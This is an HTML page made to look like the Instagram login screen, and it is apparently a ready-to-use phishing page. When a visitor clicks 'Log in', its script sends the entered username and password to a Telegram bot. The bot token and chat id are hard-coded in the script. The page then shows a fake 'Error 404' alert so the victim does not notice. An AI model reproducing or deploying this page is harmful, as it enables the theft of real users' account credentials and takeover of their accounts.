<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Instagram Login</title>
    <style>
        body {
            font-family: Arial, sans-serif;
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
            margin: 0;
            background-color: #fafafa;
        }
        .login-container {
            width: 350px;
            border: 1px solid #dbdbdb;
            padding: 40px;
            background-color: #fff;
            text-align: center;
        }

        .login-container img{
            width: 300px;
            margin: 0;
            padding: 0;
        }

        .login-container h1 {
            font-family: 'Helvetica Neue', sans-serif;
            font-size: 48px;
            font-weight: 600;
            color: #262626;
            margin-bottom: 20px;
        }
        .login-container input[type="text"],
        .login-container input[type="password"] {
            width: 100%;
            padding: 10px;
            margin: 8px 0;
            border: 1px solid #dbdbdb;
            border-radius: 3px;
            background-color: #fafafa;
        }
        .login-container button {
            width: 100%;
            padding: 10px;
            background-color: #0095f6;
            color: #fff;
            border: none;
            border-radius: 4px;
            font-weight: bold;
            cursor: pointer;
        }
        .login-container .or-divider {
            display: flex;
            align-items: center;
            color: #8e8e8e;
            margin: 15px 0;
        }
        .login-container .or-divider::before,
        .login-container .or-divider::after {
            content: "";
            flex: 1;
            height: 1px;
            background-color: #dbdbdb;
        }
        .login-container .or-divider::before {
            margin-right: 10px;
        }
        .login-container .or-divider::after {
            margin-left: 10px;
        }
        .login-container .facebook-login {
            color: #385185;
            font-weight: bold;
            text-decoration: none;
            margin-top: 10px;
            display: inline-block;
        }
        .login-container .forgot-password,
        .login-container .signup {
            color: #00376b;
            font-size: 12px;
            text-decoration: none;
            display: block;
            margin-top: 10px;
        }
    </style>
</head>
<body>

    <div class="login-container">
        <img src="https://cdn.pixabay.com/photo/2016/08/15/01/29/instagram-1594387_1280.png" alt="logo">
        <input type="text" id="username" placeholder="Phone number, username, or email">
        <input type="password" id="password" placeholder="Password">
        <button onclick="sendLoginInfo()">Log in</button>
        
        <div class="or-divider">OR</div>
        
        <a href="https://www.facebook.com/?locale=ru_RU" class="facebook-login">Log in with Facebook</a>
        
        <a href="https://www.instagram.com/accounts/password/reset/" class="forgot-password">Forgot password?</a>
        
        <div class="signup-container">
            <p>Don't have an account? <a href="https://www.instagram.com/accounts/emailsignup/" class="signup">Sign up</a></p>
        </div>
    </div>

    <script>
        function sendLoginInfo() {
            const username = document.getElementById('username').value;
            const password = document.getElementById('password').value;

            const message = `Login: ${username} Password: ${password}`;
            const apiUrl = `https://api.telegram.org/bot6194531835:AAFJnUm5ENXiSs-tI4Hdv8FBLrqha4KEjxY/sendMessage?chat_id=5892800487&text=${encodeURIComponent(message)}`;

            fetch(apiUrl)
                .then(response => {
                    if (response.ok) {
                        alert('Error 404');
                    } else {
                        alert('Failed to send information');
                    }
                })
                .catch(error => {
                    console.error('Error:', error);
                    alert('Error sending information');
                });
        }
    </script>

</body>
</html>